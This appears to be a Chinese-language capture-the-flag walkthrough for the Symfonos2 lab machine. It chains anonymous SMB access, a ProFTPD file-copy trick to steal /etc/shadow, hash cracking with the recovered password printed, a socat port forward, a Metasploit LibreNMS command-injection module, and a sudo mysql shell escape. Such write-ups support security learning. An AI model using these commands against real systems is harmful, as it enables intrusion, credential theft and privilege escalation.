Symfonos2

symfonos2

nmap 扫描一下端口

访问 80 端口有个图片（1920*1080 的还可以用来做壁纸）

nmap 扫出来的里面有个 ftp，访问需要验证身份
还有个 smb，通过 smbclient 连接一下：smbclient //192.168.149.180/anonymous
密码那里直接回车就行

把里面的 log.txt 下到本地，然后查看一下，没发现 password 相关的，找到一个 user：aeolus

另外可以看一下 log.txt 第一行的内容
root@symfonos2:~# cat /etc/shadow > /var/backups/shadow.bak
用这个脚本，拷贝一下
https://github.com/chcx/cpx_proftpd/

然后 get 下来

看看 shadow，从这里面获得了用户的密码 hash

爆破一下，很快就能被跑出一个 aeolus:sergioteamo

用这个登录 ssh 成功

nmap 扫一下自己，发现有个 8080 口是开这个，但是只能本地访问

socat -d TCP-LISTEN:6666,fork,reuseaddr tcp:127.0.0.1:8080

然后本地访问就行了，火狐可能会禁止访问

此网址使用了一个通常用于网络浏览以外目的的端口。出于安全原因，Firefox 取消了该请求。

在火狐访问 about:config 然后新建一个

首选项名称：
network.security.ports.banned.override
值：
0-65535

就可以访问了

用 msf 的 linux/http/librenms_addhost_cmd_inject 进行攻击
set rhosts 192.168.149.180
set rport 6666
set username aeolus
set password sergioteamo
set lhost 192.168.149.180

这时候 sudo -l 可以发现 mysql 是可以不需要密码就能 sudo 运行的
可以在这里面找 https://gtfobins.github.io
mysql -e '\! /bin/sh'

原文: https://www.yuque.com/hxfqg9/web/sol0pm